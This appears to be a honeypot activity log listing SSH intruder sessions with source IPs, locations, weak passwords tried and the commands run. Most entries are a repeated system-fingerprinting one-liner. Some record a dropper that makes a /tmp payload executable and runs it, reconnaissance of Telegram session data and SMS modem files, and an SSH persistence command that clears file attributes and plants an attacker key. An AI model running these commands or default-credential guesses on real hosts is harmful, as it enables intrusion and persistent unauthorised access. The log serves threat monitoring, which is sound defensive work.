$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 autobahn_pi (79.201.182.167) — Bremen, Germany · 2 sessions · 3 cmds

2026-03-16 07:15 EDT · as pi/raspberry

make executable → execute payload → execute from /tmp

$ cd /tmp && chmod +x puPoPAYL && bash -c ./puPoPAYL

↳ make executable

$ ./puPoPAYL

↳ execute payload

$ scp -t /tmp/puPoPAYL

↳ execute from /tmp

🎭 kiwi_root_3 (65.254.93.36) — Bungarribee, Australia · 1 session · 1 cmd

2026-03-16 06:49 EDT · as root/root

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 roo_root_3 (170.64.227.142) — Sydney, Australia · 2 sessions · 8 cmds

2026-03-16 06:31 EDT · as root/123456, root/password

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 strudel_root_11 (46.224.146.18) — Nuremberg, Germany · 1 session · 9 cmds

2026-03-16 05:23 EDT · as root/root

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 shadow_root_47 (45.15.224.178) — Chisinau, Moldova · 1 session · 9 cmds

2026-03-16 04:48 EDT · as root/root

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 scone_root_9 (138.68.149.32) — Slough, United Kingdom · 2 sessions · 8 cmds

2026-03-16 04:10 EDT · as root/admin, root/root

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×2

$ uname -s -v -n -m 2 > /dev/null ×2

$ uname -m 2 > /dev/null ×2

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×2

🎭 dutch_sol_2 (178.62.223.152) — Amsterdam, Netherlands · 2 sessions · 2 cmds

2026-03-16 03:48 EDT · as oracle/!@#$%^&*(), oracle/Password

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×2

🎭 specter_root_57 (103.213.238.91) — Dhaka, Bangladesh · 1 session · 2 cmds

2026-03-16 01:03 EDT · as oracle/Oracle123!

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 pretzel_root_14 (164.90.235.167) — Frankfurt am Main, Germany · 8 sessions · 32 cmds

2026-03-15 23:56 EDT · as root/1234, root/123456, root/12345678

export → uname → cat (repeated export 8x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×8

$ uname -s -v -n -m 2 > /dev/null ×8

$ uname -m 2 > /dev/null ×8

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×8

🎭 strudel_root_12 (206.189.60.179) — Frankfurt am Main, Germany · 1 session · 4 cmds

2026-03-15 23:58 EDT · as root/root

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 toque_root_3 (165.227.45.208) — Toronto, Canada · 1 session · 1 cmd

2026-03-15 23:48 EDT · as mysql/mysql

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m

🎭 scone_root_10 (159.65.84.212) — Slough, United Kingdom · 3 sessions · 12 cmds

2026-03-15 23:04 EDT · as admin/123456, admin/admin123, admin/password

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 spice_root_5 (157.245.109.118) — Bengaluru, India · 4 sessions · 16 cmds

2026-03-15 22:50 EDT · as admin/admin123, root/1234, root/admin123

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 ghost_root_74 (157.230.250.44) — Singapore, Singapore · 6 sessions · 24 cmds

2026-03-15 21:45 EDT · as root/1234, root/123456, root/admin

export → uname → cat (repeated export 6x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×6

$ uname -s -v -n -m 2 > /dev/null ×6

$ uname -m 2 > /dev/null ×6

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×6

🎭 strudel_root_13 (157.230.22.169) — Frankfurt am Main, Germany · 3 sessions · 12 cmds

2026-03-15 18:18 EDT · as root/123456, root/12345678, root/password

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 phantom_root_46 (152.42.224.122) — Singapore, Singapore · 3 sessions · 12 cmds

2026-03-15 18:04 EDT · as root/1234, root/admin123, root/pass123

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×3

$ uname -s -v -n -m 2 > /dev/null ×3

$ uname -m 2 > /dev/null ×3

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×3

🎭 dragon_root_23 (182.92.56.241) — Beijing, China · 1 session · 1 cmd

2026-03-15 15:37 EDT · as test/test

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 crumpet_root_9 (161.35.164.134) — Slough, United Kingdom · 8 sessions · 32 cmds

2026-03-15 13:01 EDT · as root/1234, root/123456, root/12345678

export → uname → cat (repeated export 8x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×8

$ uname -s -v -n -m 2 > /dev/null ×8

$ uname -m 2 > /dev/null ×8

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×8

🎭 star_root_15 (64.236.201.57) — Chicago, United States · 1 session · 1 cmd

2026-03-15 12:53 EDT · as root/root

hostname discovery

$ hostname

↳ hostname discovery

🎭 lotus_root_11 (139.59.32.123) — Bengaluru, India · 5 sessions · 20 cmds

2026-03-15 12:19 EDT · as root/1234, root/123456, root/12345678

export → uname → cat (repeated export 5x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×5

$ uname -s -v -n -m 2 > /dev/null ×5

$ uname -m 2 > /dev/null ×5

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×5

🎭 ghost_root_75 (81.192.46.29) — Rabat, Morocco · 1 session · 2 cmds

2026-03-15 12:33 EDT · as oracle/oracle1234567

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 gouda_root_11 (159.65.196.82) — Amsterdam, Netherlands · 7 sessions · 28 cmds

2026-03-15 12:07 EDT · as root/123456, root/admin, root/admin123

export → uname → cat (repeated export 7x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×7

$ uname -s -v -n -m 2 > /dev/null ×7

$ uname -m 2 > /dev/null ×7

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×7

🎭 gouda_root_12 (206.189.97.65) — Amsterdam, Netherlands · 4 sessions · 16 cmds

2026-03-15 12:12 EDT · as root/123456, root/admin, root/password

export → uname → cat (repeated export 4x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×4

$ uname -s -v -n -m 2 > /dev/null ×4

$ uname -m 2 > /dev/null ×4

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×4

🎭 cowboy_root_15 (178.156.254.210) — Ashburn, United States · 3 sessions · 3 cmds

2026-03-15 10:52 EDT · as root/1234, root/123456, root/12345678

ls → pwd

$ ls -la / ×2

$ pwd

🎭 lotus_root_12 (64.227.187.243) — Bengaluru, India · 8 sessions · 32 cmds

2026-03-15 11:54 EDT · as root/1234, root/123456, root/12345678

export → uname → cat (repeated export 8x)

